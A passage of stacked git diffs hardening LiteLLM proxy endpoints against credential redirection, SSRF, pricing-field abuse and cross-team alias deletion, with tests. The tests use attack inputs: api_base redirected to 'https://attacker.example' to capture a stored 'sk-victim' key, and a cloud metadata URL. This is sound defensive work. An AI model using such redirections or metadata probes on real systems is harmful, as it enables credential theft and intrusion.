+            code=status.HTTP_400_BAD_REQUEST,
+            param="litellm_params.api_key",
+        )
 
 
 async def update_team(*args, **kwargs):
@@ -112,13 +254,16 @@ def update_db_model(
         merged_deployment_dict["model_name"] = updated_patch.model_name
 
     # update litellm params
+    patch_litellm_plaintext: dict = {}
     if updated_patch.litellm_params:
+        patch_litellm_plaintext = updated_patch.litellm_params.model_dump(
+            exclude_none=True
+        )
+        # SSRF-guard the patched destination (api_base/base_url).
+        _validate_model_url_params(patch_litellm_plaintext)
         # Encrypt any sensitive values
         encrypted_params = {
-            k: encrypt_value_helper(v)
-            for k, v in updated_patch.litellm_params.model_dump(
-                exclude_none=True
-            ).items()
+            k: encrypt_value_helper(v) for k, v in patch_litellm_plaintext.items()
         }
 
         merged_deployment_dict["litellm_params"].update(encrypted_params)  # type: ignore
@@ -129,6 +274,13 @@ def update_db_model(
             merged_deployment_dict["model_info"] = {}
         merged_deployment_dict["model_info"].update(
             updated_patch.model_info.model_dump(exclude_none=True)
+        )
+
+    # The deployment id is the immutable primary key; never let a patched (or
+    # freshly-constructed, auto-id'd) model_info blob change it.
+    if db_model.model_info is not None and db_model.model_info.id is not None:
+        merged_deployment_dict.setdefault("model_info", {})["id"] = (  # type: ignore
+            db_model.model_info.id
         )
 
     # Honor explicit-null clears LAST, after both merges, so a model_info blob the UI
@@ -156,6 +308,18 @@ def update_db_model(
             ):
                 merged_deployment_dict["model_info"].pop(field, None)  # type: ignore
                 merged_deployment_dict.get("litellm_params", {}).pop(field, None)  # type: ignore
+
+    # Refuse to silently re-point a stored credential at a new endpoint: if the
+    # destination changed without a fresh credential, drop the inherited secret
+    # so it must be re-entered rather than forwarded to the new destination.
+    if updated_patch.litellm_params:
+        _strip_credentials_on_destination_change(
+            merged_deployment_dict["litellm_params"],  # type: ignore
+            patch_litellm_plaintext,
+            lambda field: _decrypted_param(
+                getattr(db_model.litellm_params, field, None)
+            ),
+        )
 
     # convert to prisma compatible format
 
@@ -273,6 +437,13 @@ async def patch_model(
                 code=status.HTTP_403_FORBIDDEN,
                 param="blocked",
             )
+
+        # Pricing overrides and credential binding are proxy-admin-only.
+        _assert_privileged_model_fields_authorized(
+            litellm_params=patch_data.litellm_params,
+            model_info=patch_data.model_info,
+            user_api_key_dict=user_api_key_dict,
+        )
 
         # Handle team model updates with proper alias management
         update_data = await _update_team_model_in_db(
@@ -443,9 +614,32 @@ async def _update_team_model_in_db(
         premium_user=premium_user,
     )
 
-    patch_team_id = patch_data.model_info.team_id if patch_data.model_info else None
+    db_team_id = db_model.model_info.team_id if db_model.model_info else None
+    explicit_patch_team_id = (
+        patch_data.model_info.team_id if patch_data.model_info else None
+    )
 
-    # No team_id in patch, proceed with standard update
+    # A team admin must not move a model to a different team.
+    if (
+        explicit_patch_team_id is not None
+        and db_team_id is not None
+        and explicit_patch_team_id != db_team_id
+    ):
+        raise ProxyException(
+            message="Cannot reassign a model to a different team.",
+            type=ProxyErrorTypes.auth_error.value,
+            code=status.HTTP_403_FORBIDDEN,
+            param="model_info.team_id",
+        )
+
+    # Inherit the persisted team_id when the patch omits it, so a team-scoped
+    # model keeps its team scoping (and its internal model_name) instead of being
+    # renamed into the global pool via a model_info-less PATCH.
+    patch_team_id = (
+        explicit_patch_team_id if explicit_patch_team_id is not None else db_team_id
+    )
+
+    # Genuinely non-team model: standard update.
     if patch_team_id is None:
         return update_db_model(db_model=db_model, updated_patch=patch_data)
 
@@ -463,7 +657,6 @@ async def _update_team_model_in_db(
     patch_data.model_info.team_public_model_name = public_model_name
 
     # Check if team assignment is new or changed
-    db_team_id = db_model.model_info.team_id if db_model.model_info else None
     is_new_team_assignment = db_team_id != patch_team_id
 
     if is_new_team_assignment:
@@ -826,7 +1019,13 @@ async def delete_model(
         # delete team model alias
         if model_params.model_info.team_id is not None:
             removed_model_aliases = await delete_team_model_alias(
-                public_model_name=model_params.model_name,
+                # The team alias is keyed on the PUBLIC model name; the internal
+                # model_name is the unique UUID, which never matches an alias, so
+                # using it here leaves the alias (and team.models entry) orphaned.
+                public_model_name=(
+                    model_params.model_info.team_public_model_name
+                    or model_params.model_name
+                ),
                 prisma_client=prisma_client,
             )
 
@@ -870,8 +1069,16 @@ async def delete_model(
                 )
 
             ## DELETE FROM ROUTER ##
+            # Only evict a router deployment that originated from the DB. A
+            # config (static) deployment must never be removed by deleting a DB
+            # row, even if a row shares its id.
             if llm_router is not None:
-                llm_router.delete_deployment(id=model_info.id)
+                router_deployment = llm_router.get_deployment(model_id=model_info.id)
+                if (
+                    router_deployment is not None
+                    and router_deployment.model_info.db_model
+                ):
+                    llm_router.delete_deployment(id=model_info.id)
 
             ## CREATE AUDIT LOG ##
             asyncio.create_task(
@@ -1002,6 +1209,7 @@ async def add_new_model(
     """
     from litellm.proxy.proxy_server import (
         general_settings,
+        llm_router,
         premium_user,
         prisma_client,
         proxy_config,
@@ -1025,6 +1233,35 @@ async def add_new_model(
             prisma_client=prisma_client,
             premium_user=premium_user,
         )
+
+        # Pricing overrides and credential binding are proxy-admin-only.
+        _assert_privileged_model_fields_authorized(
+            litellm_params=model_params.litellm_params,
+            model_info=model_params.model_info,
+            user_api_key_dict=user_api_key_dict,
+        )
+        # A non-admin team model must carry its own credential (no global-key fallback).
+        _assert_team_model_has_own_credential(model_params, user_api_key_dict)
+        # SSRF-guard the destination on create.
+        _validate_model_url_params(
+            model_params.litellm_params.model_dump(exclude_none=True)
+        )
+        # Reject a model_info.id that collides with a live deployment, so a DB
+        # row cannot hijack (and on delete evict) a config/router deployment's id.
+        if (
+            model_params.model_info.id is not None
+            and llm_router is not None
+            and llm_router.has_model_id(model_params.model_info.id)
+        ):
+            raise ProxyException(
+                message=(
+                    f"model_info.id={model_params.model_info.id} already belongs to an "
+                    "existing deployment; omit model_info.id to auto-generate one."
+                ),
+                type=ProxyErrorTypes.validation_error.value,
+                code=status.HTTP_400_BAD_REQUEST,
+                param="model_info.id",
+            )
 
         model_response: Optional[LiteLLM_ProxyModelTable] = None
         # update DB
@@ -1192,6 +1429,13 @@ async def update_model(
             premium_user=premium_user,
         )
 
+        # Pricing/credential field authz, parity with patch_model / add_new_model.
+        _assert_privileged_model_fields_authorized(
+            litellm_params=model_params.litellm_params,
+            model_info=model_params.model_info,
+            user_api_key_dict=user_api_key_dict,
+        )
+
         # update DB
         if store_model_in_db is True:
             _existing_litellm_params_dict = dict(
@@ -1204,6 +1448,8 @@ async def update_model(
             _new_litellm_params_dict = model_params.litellm_params.dict(
                 exclude_none=True
             )
+            # SSRF-guard the patched destination on this legacy update path too.
+            _validate_model_url_params(_new_litellm_params_dict)
 
             ### ENCRYPT PARAMS ###
             for k, v in _new_litellm_params_dict.items():
@@ -1224,6 +1470,15 @@ async def update_model(
                     merged_dictionary[key] = _existing_litellm_params_dict[key]
                 else:
                     pass
+
+            # Don't silently re-point an inherited credential at a new endpoint.
+            _strip_credentials_on_destination_change(
+                merged_dictionary,
+                _new_litellm_params_dict,
+                lambda field: _decrypted_param(
+                    _existing_litellm_params_dict.get(field)
+                ),
+            )
 
             _data: dict = {
                 "litellm_params": json.dumps(merged_dictionary),  # type: ignore

--- a/litellm/proxy/management_endpoints/model_management_endpoints.py
+++ b/litellm/proxy/management_endpoints/model_management_endpoints.py
@@ -36,6 +36,7 @@ from litellm.proxy._types import (
     TeamModelDeleteRequest,
     UserAPIKeyAuth,
 )
+from litellm.litellm_core_utils.litellm_logging import _CUSTOM_PRICING_KEYS
 from litellm.litellm_core_utils.url_utils import SSRFError, validate_url
 from litellm.proxy.auth.user_api_key_auth import user_api_key_auth
 from litellm.proxy.common_utils.encrypt_decrypt_utils import (
@@ -75,14 +76,20 @@ _CREDENTIAL_LITELLM_PARAMS = (
     "litellm_credential_name",
     "aws_secret_access_key",
     "aws_session_token",
+    "azure_ad_token",
     "vertex_credentials",
 )
-# Caller-controlled endpoint URLs that must be SSRF-validated on write.
+# Caller-controlled endpoint URLs that must be SSRF-validated on write. Mirrors
+# the endpoint-redirect subset of auth_utils._BANNED_REQUEST_BODY_PARAMS so a
+# stored config can't reach an internal host that the request-time guard blocks.
 _URL_LITELLM_PARAMS = (
     "api_base",
     "base_url",
     "aws_bedrock_runtime_endpoint",
     "aws_sts_endpoint",
+    "sagemaker_base_url",
+    "s3_endpoint_url",
+    "deployment_url",
 )
 # Destination fields whose change must drop an inherited credential (URLs above
 # plus the provider selector, which isn't a URL so isn't SSRF-validated).
@@ -135,18 +142,31 @@ def _assert_credential_resupplied_on_destination_change(
     db_plaintext: "Callable[[str], object]",
 ) -> None:
     """Changing a model's destination (api_base/base_url/provider endpoint) must
-    not send an inherited credential to the new endpoint. Clearing the credential
-    is NOT sufficient: an empty/absent key falls back to the proxy's environment
-    secret (e.g. OPENAI_API_KEY) and would still be sent there. So require the
-    caller to re-supply, with a non-empty value, every credential the model
-    already had; otherwise reject. A non-empty re-supplied value is the caller's
-    own credential going to their own endpoint, which is allowed."""
+    not send a credential to the new endpoint that the caller did not themselves
+    provide. Two things are required. First, the patch must carry a non-empty
+    credential at all: even a model stored without one falls back to the proxy's
+    environment secret (e.g. OPENAI_API_KEY) at call time, which would then be
+    sent to the new endpoint. Second, every credential the model already had must
+    be re-supplied non-empty, so an inherited secret is never kept alongside an
+    unrelated new one. A non-empty re-supplied value is the caller's own
+    credential going to their own endpoint, which is allowed."""
     destination_changed = any(
         field in patch_plaintext and patch_plaintext[field] != db_plaintext(field)
         for field in _DESTINATION_LITELLM_PARAMS
     )
     if not destination_changed:
         return
+    if not any(patch_plaintext.get(field) for field in _CREDENTIAL_LITELLM_PARAMS):
+        raise ProxyException(
+            message=(
+                "Provide a non-empty credential (e.g. api_key) when changing the "
+                "model endpoint; otherwise the proxy's environment credential "
+                "would be used at the new destination."
+            ),
+            type=ProxyErrorTypes.validation_error.value,
+            code=status.HTTP_400_BAD_REQUEST,
+            param="api_key",
+        )
     for field in _CREDENTIAL_LITELLM_PARAMS:
         if db_plaintext(field) and not patch_plaintext.get(field):
             raise ProxyException(
@@ -162,10 +182,15 @@ def _assert_credential_resupplied_on_destination_change(
 
 
 def _is_pricing_field(field: str) -> bool:
-    """Custom per-token / per-second / per-pixel / per-request (and tiered) cost
-    overrides all follow this naming, so match by convention rather than an
-    enumerated subset that drifts out of date."""
-    return "cost_per" in field or field.endswith("_cost")
+    """A field that influences cost/spend accounting, so it is proxy-admin-only.
+
+    The authoritative boundary is litellm's own custom-pricing key set (the same
+    fields the cost calculator reads from a deployment), so this cannot drift
+    behind the calculator. base_model redirects the cost-lookup model, and the
+    "cost" substring is a belt-and-suspenders catch for any future field that
+    follows the naming convention before it lands in the type.
+    """
+    return field in _CUSTOM_PRICING_KEYS or field == "base_model" or "cost" in field
 
 
 def _contains_env_reference(value: object) -> bool:

--- a/litellm/proxy/management_endpoints/model_management_endpoints.py
+++ b/litellm/proxy/management_endpoints/model_management_endpoints.py
@@ -43,6 +43,11 @@ from litellm.proxy.common_utils.encrypt_decrypt_utils import (
     decrypt_value_helper,
     encrypt_value_helper,
 )
+from litellm.proxy.common_utils.destination_credential_policy import (
+    CREDENTIAL_FIELDS,
+    URL_DESTINATION_FIELDS,
+    consumed_credentials_for,
+)
 from litellm.proxy.common_utils.resource_ownership import is_proxy_admin
 from litellm.proxy.management_endpoints.common_utils import _is_user_team_admin
 from litellm.proxy.management_endpoints.team_endpoints import (
@@ -69,31 +74,13 @@ from litellm.utils import get_utc_datetime
 router = APIRouter()
 
 
-# Credential fields that must never be silently re-pointed at a new endpoint,
-# and the routing fields that change where they are sent.
-_CREDENTIAL_LITELLM_PARAMS = (
-    "api_key",
-    "litellm_credential_name",
-    "aws_secret_access_key",
-    "aws_session_token",
-    "aws_web_identity_token",
-    "azure_ad_token",
-    "vertex_credentials",
-)
-# Caller-controlled endpoint URLs that must be SSRF-validated on write. Mirrors
-# the endpoint-redirect subset of auth_utils._BANNED_REQUEST_BODY_PARAMS so a
-# stored config can't reach an internal host that the request-time guard blocks.
-_URL_LITELLM_PARAMS = (
-    "api_base",
-    "base_url",
-    "aws_bedrock_runtime_endpoint",
-    "aws_sts_endpoint",
-    "sagemaker_base_url",
-    "s3_endpoint_url",
-    "deployment_url",
-)
-# Destination fields whose change must drop an inherited credential (URLs above
-# plus the provider selector, which isn't a URL so isn't SSRF-validated).
+# Credential and endpoint-URL field sets, plus the provider-specific credential
+# policy, live in one shared module so the write paths and /health/test_connection
+# cannot drift apart.
+_CREDENTIAL_LITELLM_PARAMS = CREDENTIAL_FIELDS
+_URL_LITELLM_PARAMS = URL_DESTINATION_FIELDS
+# Destination fields whose change requires a fresh credential (URLs above plus the
+# provider selector, which isn't a URL so isn't SSRF-validated).
 _DESTINATION_LITELLM_PARAMS = _URL_LITELLM_PARAMS + ("custom_llm_provider",)
 
 
@@ -144,30 +131,35 @@ def _assert_credential_resupplied_on_destination_change(
 ) -> None:
     """Changing a model's destination (api_base/base_url/provider endpoint) must
     not send a credential to the new endpoint that the caller did not themselves
-    provide. Two things are required. First, the patch must carry a non-empty
-    credential at all: even a model stored without one falls back to the proxy's
-    environment secret (e.g. OPENAI_API_KEY) at call time, which would then be
-    sent to the new endpoint. Second, every credential the model already had must
-    be re-supplied non-empty, so an inherited secret is never kept alongside an
-    unrelated new one. A non-empty re-supplied value is the caller's own
-    credential going to their own endpoint, which is allowed."""
-    destination_changed = any(
-        field in patch_plaintext and patch_plaintext[field] != db_plaintext(field)
+    provide. Two things are required. First, each changed destination must be
+    accompanied by a non-empty credential its provider actually consumes: an
+    api_key does not make an AWS endpoint change safe, because Bedrock/SageMaker
+    sign with ambient AWS credentials regardless, and even a model with no stored
+    credential falls back to the proxy's environment secret at call time. Second,
+    every credential the model already had must be re-supplied non-empty, so an
+    inherited secret is never kept alongside an unrelated new one. A non-empty
+    re-supplied value is the caller's own credential going to their own endpoint,
+    which is allowed."""
+    changed_destinations = [
+        field
         for field in _DESTINATION_LITELLM_PARAMS
-    )
-    if not destination_changed:
+        if field in patch_plaintext and patch_plaintext[field] != db_plaintext(field)
+    ]
+    if not changed_destinations:
         return
-    if not any(patch_plaintext.get(field) for field in _CREDENTIAL_LITELLM_PARAMS):
-        raise ProxyException(
-            message=(
-                "Provide a non-empty credential (e.g. api_key) when changing the "
-                "model endpoint; otherwise the proxy's environment credential "
-                "would be used at the new destination."
-            ),
-            type=ProxyErrorTypes.validation_error.value,
-            code=status.HTTP_400_BAD_REQUEST,
-            param="api_key",
-        )
+    for field in changed_destinations:
+        consumed = consumed_credentials_for(field)
+        if not any(patch_plaintext.get(cred) for cred in consumed):
+            raise ProxyException(
+                message=(
+                    f"Changing {field} requires supplying a non-empty credential it "
+                    f"uses ({', '.join(consumed)}); otherwise the proxy's stored or "
+                    "ambient credential would be sent to the new destination."
+                ),
+                type=ProxyErrorTypes.validation_error.value,
+                code=status.HTTP_400_BAD_REQUEST,
+                param=field,
+            )
     for field in _CREDENTIAL_LITELLM_PARAMS:
         if db_plaintext(field) and not patch_plaintext.get(field):
             raise ProxyException(
@@ -1105,6 +1097,7 @@ async def delete_model(
                     model_params.model_info.team_public_model_name
                     or model_params.model_name
                 ),
+                team_id=model_params.model_info.team_id,
                 prisma_client=prisma_client,
             )
 
@@ -1204,12 +1197,15 @@ async def delete_model(
 
 async def delete_team_model_alias(
     public_model_name: str,
+    team_id: str,
     prisma_client: PrismaClient,
 ) -> List[Tuple[str, str]]:
     """
     Delete a team model alias
 
-    Iterate through all team model aliases and delete the one that matches the model_id
+    Only the owning team's alias is touched: a public model name is not unique
+    across teams, so without scoping by team_id one team admin could delete
+    another team's alias that happens to point at the same public name.
 
     Returns:
     - List of team id + model alias pairs that were removed
@@ -1220,6 +1216,8 @@ async def delete_team_model_alias(
     tasks = []
     removed_model_aliases = []
     for team_model_alias in team_model_aliases:
+        if team_model_alias.team is None or team_model_alias.team.team_id != team_id:
+            continue
         model_aliases = team_model_alias.model_aliases  # {"alias": "public model name"}
         id = team_model_alias.id
 

--- a/litellm/proxy/management_endpoints/model_management_endpoints.py
+++ b/litellm/proxy/management_endpoints/model_management_endpoints.py
@@ -76,6 +76,7 @@ _CREDENTIAL_LITELLM_PARAMS = (
     "litellm_credential_name",
     "aws_secret_access_key",
     "aws_session_token",
+    "aws_web_identity_token",
     "azure_ad_token",
     "vertex_credentials",
 )

--- a/litellm/proxy/management_endpoints/model_management_endpoints.py
+++ b/litellm/proxy/management_endpoints/model_management_endpoints.py
@@ -142,30 +142,63 @@ def _strip_credentials_on_destination_change(
             merged_litellm_params.pop(field, None)
 
 
+def _is_pricing_field(field: str) -> bool:
+    """Custom per-token / per-second / per-pixel / per-request (and tiered) cost
+    overrides all follow this naming, so match by convention rather than an
+    enumerated subset that drifts out of date."""
+    return "cost_per" in field or field.endswith("_cost")
+
+
+def _contains_env_reference(value: object) -> bool:
+    """True if any (possibly nested) string is an `os.environ/` reference, which
+    resolves to a server-side environment secret at call time."""
+    if isinstance(value, str):
+        return value.startswith("os.environ/")
+    if isinstance(value, dict):
+        return any(_contains_env_reference(v) for v in value.values())
+    if isinstance(value, list):
+        return any(_contains_env_reference(v) for v in value)
+    return False
+
+
 def _assert_privileged_model_fields_authorized(
     litellm_params: Optional[BaseModel],
     model_info: Optional[BaseModel],
     user_api_key_dict: UserAPIKeyAuth,
 ) -> None:
-    """Pricing overrides and credential-name binding are proxy-admin-only.
+    """Restrict privileged model fields on non-admin (team-admin) writes.
 
-    Per-token/character pricing (SPECIAL_MODEL_INFO_PARAMS) gates spend/budget
-    enforcement, so a non-admin must not set or clear it. litellm_credential_name
-    resolves a globally-stored credential by name with no ownership model, so
-    only a proxy admin may bind one to a model.
+    - Any custom pricing/cost field gates spend/budget enforcement, so a
+      non-admin must not set or clear one.
+    - `litellm_credential_name` resolves a globally-stored credential by name
+      with no ownership model, so only a proxy admin may bind one.
+    - `os.environ/` references resolve to the server's environment secrets
+      (e.g. the operator's global provider key), so a non-admin must supply
+      literal values, not references (mirrors /health/test_connection).
     """
     if is_proxy_admin(user_api_key_dict):
         return
-    for field in SPECIAL_MODEL_INFO_PARAMS:
-        if _field_explicitly_set(litellm_params, field) or _field_explicitly_set(
-            model_info, field
-        ):
-            raise ProxyException(
-                message=f"Only proxy admins can set model pricing fields (e.g. {field}).",
-                type=ProxyErrorTypes.auth_error.value,
-                code=status.HTTP_403_FORBIDDEN,
-                param=field,
-            )
+    for model in (litellm_params, model_info):
+        if model is None:
+            continue
+        for field, value in model.model_dump(exclude_unset=True).items():
+            if _is_pricing_field(field):
+                raise ProxyException(
+                    message=f"Only proxy admins can set model pricing fields (e.g. {field}).",
+                    type=ProxyErrorTypes.auth_error.value,
+                    code=status.HTTP_403_FORBIDDEN,
+                    param=field,
+                )
+            if _contains_env_reference(value):
+                raise ProxyException(
+                    message=(
+                        f"os.environ/ references are not permitted in non-admin "
+                        f"model parameters (field: {field}); supply a literal value."
+                    ),
+                    type=ProxyErrorTypes.auth_error.value,
+                    code=status.HTTP_403_FORBIDDEN,
+                    param=field,
+                )
     if (
         _field_explicitly_set(litellm_params, "litellm_credential_name")
         and litellm_params.litellm_credential_name is not None  # type: ignore

--- a/litellm/proxy/management_endpoints/model_management_endpoints.py
+++ b/litellm/proxy/management_endpoints/model_management_endpoints.py
@@ -130,16 +130,17 @@ def _decrypted_param(value: object) -> object:
     )
 
 
-def _strip_credentials_on_destination_change(
-    merged_litellm_params: dict,
+def _assert_credential_resupplied_on_destination_change(
     patch_plaintext: dict,
     db_plaintext: "Callable[[str], object]",
 ) -> None:
-    """When a destination field (api_base/base_url/provider endpoint) changes,
-    drop every INHERITED credential — one the patch did not itself supply — so a
-    stored secret is never silently re-pointed at a new (possibly attacker-
-    controlled) endpoint. Cleared per field: supplying one credential must not
-    preserve the others."""
+    """Changing a model's destination (api_base/base_url/provider endpoint) must
+    not send an inherited credential to the new endpoint. Clearing the credential
+    is NOT sufficient: an empty/absent key falls back to the proxy's environment
+    secret (e.g. OPENAI_API_KEY) and would still be sent there. So require the
+    caller to re-supply, with a non-empty value, every credential the model
+    already had; otherwise reject. A non-empty re-supplied value is the caller's
+    own credential going to their own endpoint, which is allowed."""
     destination_changed = any(
         field in patch_plaintext and patch_plaintext[field] != db_plaintext(field)
         for field in _DESTINATION_LITELLM_PARAMS
@@ -147,8 +148,17 @@ def _strip_credentials_on_destination_change(
     if not destination_changed:
         return
     for field in _CREDENTIAL_LITELLM_PARAMS:
-        if field not in patch_plaintext:
-            merged_litellm_params.pop(field, None)
+        if db_plaintext(field) and not patch_plaintext.get(field):
+            raise ProxyException(
+                message=(
+                    f"Re-provide {field} (non-empty) when changing the model "
+                    "endpoint; a stored credential cannot be reused with, or "
+                    "cleared in favor of an environment fallback at, a new destination."
+                ),
+                type=ProxyErrorTypes.validation_error.value,
+                code=status.HTTP_400_BAD_REQUEST,
+                param=field,
+            )
 
 
 def _is_pricing_field(field: str) -> bool:
@@ -356,18 +366,6 @@ def update_db_model(
                 merged_deployment_dict["model_info"].pop(field, None)  # type: ignore
                 merged_deployment_dict.get("litellm_params", {}).pop(field, None)  # type: ignore
 
-    # Refuse to silently re-point a stored credential at a new endpoint: if the
-    # destination changed without a fresh credential, drop the inherited secret
-    # so it must be re-entered rather than forwarded to the new destination.
-    if updated_patch.litellm_params:
-        _strip_credentials_on_destination_change(
-            merged_deployment_dict["litellm_params"],  # type: ignore
-            patch_litellm_plaintext,
-            lambda field: _decrypted_param(
-                getattr(db_model.litellm_params, field, None)
-            ),
-        )
-
     # convert to prisma compatible format
 
     prisma_compatible_model_dict = PrismaCompatibleUpdateDBModel()
@@ -491,6 +489,14 @@ async def patch_model(
             model_info=patch_data.model_info,
             user_api_key_dict=user_api_key_dict,
         )
+
+        if patch_data.litellm_params and not is_proxy_admin(user_api_key_dict):
+            _assert_credential_resupplied_on_destination_change(
+                patch_data.litellm_params.model_dump(exclude_none=True),
+                lambda field: _decrypted_param(
+                    getattr(db_model.litellm_params, field, None)
+                ),
+            )
 
         # Handle team model updates with proper alias management
         update_data = await _update_team_model_in_db(
@@ -1519,13 +1525,13 @@ async def update_model(
                     pass
 
             # Don't silently re-point an inherited credential at a new endpoint.
-            _strip_credentials_on_destination_change(
-                merged_dictionary,
-                _new_litellm_params_dict,
-                lambda field: _decrypted_param(
-                    _existing_litellm_params_dict.get(field)
-                ),
-            )
+            if not is_proxy_admin(user_api_key_dict):
+                _assert_credential_resupplied_on_destination_change(
+                    _new_litellm_params_dict,
+                    lambda field: _decrypted_param(
+                        _existing_litellm_params_dict.get(field)
+                    ),
+                )
 
             _data: dict = {
                 "litellm_params": json.dumps(merged_dictionary),  # type: ignore

--- a/litellm/proxy/management_endpoints/model_management_endpoints.py
+++ b/litellm/proxy/management_endpoints/model_management_endpoints.py
@@ -135,19 +135,19 @@ def _strip_credentials_on_destination_change(
     patch_plaintext: dict,
     db_plaintext: "Callable[[str], object]",
 ) -> None:
-    """If the patch changes a destination field (api_base/base_url/custom_llm_provider)
-    without supplying a fresh credential, drop the inherited secret(s) from the
-    merged params so a stored credential is never silently re-pointed at a new
-    (possibly attacker-controlled) endpoint."""
+    """When a destination field (api_base/base_url/provider endpoint) changes,
+    drop every INHERITED credential — one the patch did not itself supply — so a
+    stored secret is never silently re-pointed at a new (possibly attacker-
+    controlled) endpoint. Cleared per field: supplying one credential must not
+    preserve the others."""
     destination_changed = any(
         field in patch_plaintext and patch_plaintext[field] != db_plaintext(field)
         for field in _DESTINATION_LITELLM_PARAMS
     )
-    supplied_new_credential = any(
-        field in patch_plaintext for field in _CREDENTIAL_LITELLM_PARAMS
-    )
-    if destination_changed and not supplied_new_credential:
-        for field in _CREDENTIAL_LITELLM_PARAMS:
+    if not destination_changed:
+        return
+    for field in _CREDENTIAL_LITELLM_PARAMS:
+        if field not in patch_plaintext:
             merged_litellm_params.pop(field, None)
 
 

--- a/tests/test_litellm/proxy/health_endpoints/test_health_endpoints.py
+++ b/tests/test_litellm/proxy/health_endpoints/test_health_endpoints.py
@@ -1991,6 +1991,24 @@ def test_non_admin_destination_override_guard():
     guard({"api_key": "sk-victim"}, {"model": "gpt-4o"}, non_admin)
     # Proxy admin is exempt even when overriding without a credential.
     guard({"api_key": "sk-victim"}, {"api_base": "https://attacker.example"}, admin)
+    # An AWS endpoint override is NOT satisfied by an api_key (Bedrock/SageMaker
+    # sign with ambient AWS credentials regardless), so it must be rejected.
+    with pytest.raises(HTTPException):
+        guard(
+            {},
+            {"aws_bedrock_runtime_endpoint": "https://attacker", "api_key": "x"},
+            non_admin,
+        )
+    with patch.object(litellm, "user_url_validation", False):
+        # Supplying an actual AWS credential is accepted.
+        guard(
+            {},
+            {
+                "aws_bedrock_runtime_endpoint": "https://attacker",
+                "aws_secret_access_key": "ak",
+            },
+            non_admin,
+        )
     # Non-admin override to an internal/metadata IP -> SSRF-rejected.
     with patch.object(litellm, "user_url_validation", True):
         with pytest.raises(HTTPException):

--- a/tests/test_litellm/proxy/health_endpoints/test_health_endpoints.py
+++ b/tests/test_litellm/proxy/health_endpoints/test_health_endpoints.py
@@ -1967,27 +1967,35 @@ def test_non_admin_destination_override_guard():
     non_admin = MagicMock(user_role="internal_user")
     admin = MagicMock(user_role=LitellmUserRoles.PROXY_ADMIN)
 
+    def guard(config, request, user):
+        _assert_non_admin_destination_override_is_safe(config, request, user)
+
     # Non-admin overrides api_base without supplying a credential -> rejected
     # (a stored or environment key would otherwise be sent there).
     with pytest.raises(HTTPException):
-        _assert_non_admin_destination_override_is_safe(
-            {"api_base": "https://attacker.example"}, non_admin
+        guard({}, {"api_base": "https://attacker.example"}, non_admin)
+    # Stored credential not re-supplied (caller sends an UNRELATED field) ->
+    # rejected; the stored api_key must not ride along to the new endpoint.
+    with pytest.raises(HTTPException):
+        guard(
+            {"api_key": "sk-victim", "api_base": "https://victim"},
+            {"api_base": "https://attacker.example", "aws_session_token": "x"},
+            non_admin,
         )
     with patch.object(litellm, "user_url_validation", False):
         # Non-admin overrides WITH their own credential -> allowed.
-        _assert_non_admin_destination_override_is_safe(
-            {"api_base": "https://attacker.example", "api_key": "sk-own"}, non_admin
+        guard(
+            {}, {"api_base": "https://attacker.example", "api_key": "sk-own"}, non_admin
         )
     # No destination override -> allowed.
-    _assert_non_admin_destination_override_is_safe({"model": "gpt-4o"}, non_admin)
+    guard({"api_key": "sk-victim"}, {"model": "gpt-4o"}, non_admin)
     # Proxy admin is exempt even when overriding without a credential.
-    _assert_non_admin_destination_override_is_safe(
-        {"api_base": "https://attacker.example"}, admin
-    )
+    guard({"api_key": "sk-victim"}, {"api_base": "https://attacker.example"}, admin)
     # Non-admin override to an internal/metadata IP -> SSRF-rejected.
     with patch.object(litellm, "user_url_validation", True):
         with pytest.raises(HTTPException):
-            _assert_non_admin_destination_override_is_safe(
+            guard(
+                {},
                 {
                     "api_base": "http://169.254.169.254/latest/meta-data/",
                     "api_key": "sk-own",
@@ -2072,3 +2080,52 @@ async def test_test_connection_model_name_path_authorizes_against_resolved_owner
         )
 
     assert captured.get("team_id") == "team-OWNER"
+
+
+@pytest.mark.asyncio
+async def test_test_connection_rejects_partial_credential_resupply_on_override():
+    """A non-admin overriding api_base while supplying only an UNRELATED credential
+    field must not let the resolved deployment's stored api_key ride along to the
+    new endpoint."""
+    from fastapi import HTTPException
+
+    from litellm.types.router import Deployment, LiteLLM_Params
+
+    victim = Deployment(
+        model_name="victim",
+        litellm_params=LiteLLM_Params(
+            model="openai/gpt-4o",
+            api_key="sk-victim",
+            api_base="https://victim.example/v1",
+        ),
+        model_info={"id": "victim-id", "team_id": "team-OWNER"},
+    )
+    mock_router = MagicMock()
+    mock_router.get_deployment.side_effect = lambda model_id: (
+        victim if model_id == "victim-id" else None
+    )
+    mock_auth = AsyncMock(return_value=True)
+    mock_ahealth = AsyncMock(return_value={"status": "healthy"})
+
+    with contextlib.ExitStack() as stack:
+        for p in _health_test_connection_patches(
+            MagicMock(), mock_router, mock_auth, mock_ahealth
+        ):
+            stack.enter_context(p)
+        with pytest.raises(HTTPException) as exc_info:
+            await health_test_model_connection(
+                request=MagicMock(),
+                mode="chat",
+                litellm_params={
+                    "model": "openai/gpt-4o",
+                    "api_base": "https://attacker.example/v1",
+                    "aws_session_token": "x",  # unrelated; api_key NOT re-supplied
+                },
+                model_info={"id": "victim-id"},
+                user_api_key_dict=MagicMock(
+                    user_id="attacker", token="t", user_role="internal_user"
+                ),
+            )
+        assert exc_info.value.status_code == 400
+
+    mock_ahealth.assert_not_called()  # stored sk-victim never went out

--- a/tests/test_litellm/proxy/health_endpoints/test_health_endpoints.py
+++ b/tests/test_litellm/proxy/health_endpoints/test_health_endpoints.py
@@ -1955,38 +1955,81 @@ async def test_test_connection_rejects_inherited_key_with_api_base_override():
     mock_ahealth.assert_not_called()  # the inherited key never went out
 
 
-def test_reject_inherited_credential_redirect_helper():
+def test_non_admin_destination_override_guard():
+    import litellm
     from fastapi import HTTPException
 
+    from litellm.proxy._types import LitellmUserRoles
     from litellm.proxy.health_endpoints._health_endpoints import (
-        _reject_inherited_credential_redirect,
+        _assert_non_admin_destination_override_is_safe,
     )
 
-    # inherited credential + overridden destination -> rejected
+    non_admin = MagicMock(user_role="internal_user")
+    admin = MagicMock(user_role=LitellmUserRoles.PROXY_ADMIN)
+
+    # Non-admin overrides api_base without supplying a credential -> rejected
+    # (a stored or environment key would otherwise be sent there).
     with pytest.raises(HTTPException):
-        _reject_inherited_credential_redirect(
-            config_litellm_params={"api_key": "sk-x", "api_base": "https://real"},
-            request_litellm_params={"api_base": "https://attacker"},
+        _assert_non_admin_destination_override_is_safe(
+            {"api_base": "https://attacker.example"}, non_admin
         )
-    # inherited stored-credential-NAME (no inline api_key) + override -> also rejected
-    with pytest.raises(HTTPException):
